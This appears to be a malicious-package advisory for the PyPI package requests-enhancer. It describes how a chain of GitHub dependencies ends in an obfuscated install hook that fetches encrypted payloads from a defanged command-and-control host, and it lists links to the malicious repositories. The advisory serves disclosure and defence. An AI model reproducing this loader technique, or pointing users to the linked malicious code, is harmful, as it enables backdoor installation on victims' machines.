MAL-2026-6247
Malicious code in requests-enhancer (PyPI)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: kam193 (950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62) Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHub repository "Hexa-devy/netflow-utils", which then attempts to download "codexio-boop/platform_syslib". The last one contains obfuscated code that during installation connects with node22.lunes[.]host:3258 and downloads encrypted payload. The payload is executed, and it then starts another loop of connections to node22.lunes[.]host:22240 and awaits next payloads to execute. During analysis, this stage did not deliver any payload. On every stage, short-living generated tokens are used.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-requests-enhancer
Reasons (based on the campaign):
- backdoor
- The package overrides the install command in setup.py to execute malicious code during installation.
- obfuscation
- The malicious code is intentionally included in a dependency of the package
- The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for requests-enhancer (pip). Pin to a known-safe version or switch to an alternative.
References
- https://github.com/Hexa-devy/netflow-utils/blob/4f33b53019b11b99889ec860d486d550701f6e9d/pyproject.toml#L35 [WEB]
- https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/setup.py [WEB]
- https://github.com/codexio-boop/platform_syslib/blob/236340da65e23865eb1a9a6e4ed94d163ae80452/connkit/__init__.py [WEB]
- https://bad-packages.kam193.eu/pypi/package/requests-enhancer [WEB]